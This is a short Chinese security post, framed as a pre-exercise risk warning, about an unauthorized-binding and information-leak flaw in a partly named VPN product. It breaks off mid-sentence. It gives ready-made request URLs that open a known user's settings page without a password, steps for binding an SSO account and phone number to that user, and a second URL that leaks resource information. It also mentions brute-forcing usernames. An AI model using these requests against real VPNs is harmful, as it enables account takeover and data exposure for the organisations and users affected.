【风险预警】某捷VPN越权绑定&信息泄露

0x01 简述HVV临近，现预警一个某捷VPN的信息泄露及越权绑定SSO账号及手机号的问题注：需要知道存在的VPN用户，当然如果不知道的话，可以使用文章后面的那个方法进行用户名爆破话不多说先上图0x02 越权绑定首先打开VPN登录页，可以看到是这样子的直接构造URL：https://1.1.1.1/cgi-bin/main.cgi?oper=showsvr&encode=GBK&username=USERNAME&sid=1614345312&oper=showresUSERNAME为已存在的用户名，访问后即可进入到这样一个界面然后我们点击左侧的“个人设置”在如上图功能这里，没有任何密码验证，可以直接给这个用户绑定SSO账号及手机号0x03 信息泄露直接构造URL：https://1.1.1.1/cgi-bin/main.cgi?oper=getrsc注：需要先使用第一步的方式构造URL进入到设置页面，否则没有Cookie，会提示“错误：当前用户不在线, ………………………………